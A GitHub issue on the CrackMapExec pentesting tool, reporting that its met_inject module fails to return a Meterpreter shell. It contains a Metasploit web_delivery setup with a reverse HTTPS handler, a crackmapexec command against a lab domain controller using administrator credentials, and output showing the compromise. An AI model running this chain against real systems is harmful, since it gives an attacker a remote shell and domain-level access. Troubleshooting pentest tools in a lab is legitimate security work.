byt3bl33d3r / CrackMapExec

A swiss army knife for pentesting networks
BSD 2-Clause "Simplified" License

CrackMapExec module met_inject doesn't respond with a reverse shell #771

Open CustosClarus opened 1 year ago

CustosClarus commented 1 year ago

Describe the bug

I have been trying very hard to make the met_inject module work, but it seems to be stuck half-way.

To Reproduce

Steps to reproduce the behavior:

msf6 > use exploit/multi/script/web_delivery 
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set target 2
target => 2
msf6 exploit(multi/script/web_delivery) > set paylod winInterrupt: use the 'exit' command to quit
msf6 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.0.99
lhost => 192.168.0.99
msf6 exploit(multi/script/web_delivery) > set lport 9999
lport => 9999
msf6 exploit(multi/script/web_delivery) > set srvport 8888
srvport => 8888

msf6 exploit(multi/script/web_delivery) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created

[*] Started HTTPS reverse handler on https://192.168.0.99:9999
[*] Using URL: http://192.168.0.99:8888/SUcwAh619w
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e [base64-encoded command removed]

2.

└─$ crackmapexec smb 192.168.0.100 -u 'administrator' -p '1qaz2wsxZZ' -d hacklab.local -M met_inject -o SRVHOST=192.168.0.99 SRVPORT=8888 RAND=SUcwAh619w SSL=http

SMB         192.168.0.100   445    HACKLAB-DC       [*] Windows Server 2016 Datacenter Evaluation 14393 x64 (name:HACKLAB-DC) (domain:hacklab.local) (signing:True) (SMBv1:True)
SMB         192.168.0.100   445    HACKLAB-DC       [+] hacklab.local\administrator:1qaz213ddfdwsxZZ (Pwn3d!)
MET_INJE... 192.168.0.100   445    HACKLAB-DC       [+] Executed payl
1. See error

[*] 192.168.0.100 web_delivery - Delivering Payload (4161 bytes)

Expected behavior

Meterpreter shell.


Crackmapexec info

Marshall-Hallenbeck commented 1 year ago

Is it being caught by AV? I was just using this module last week and it worked fine.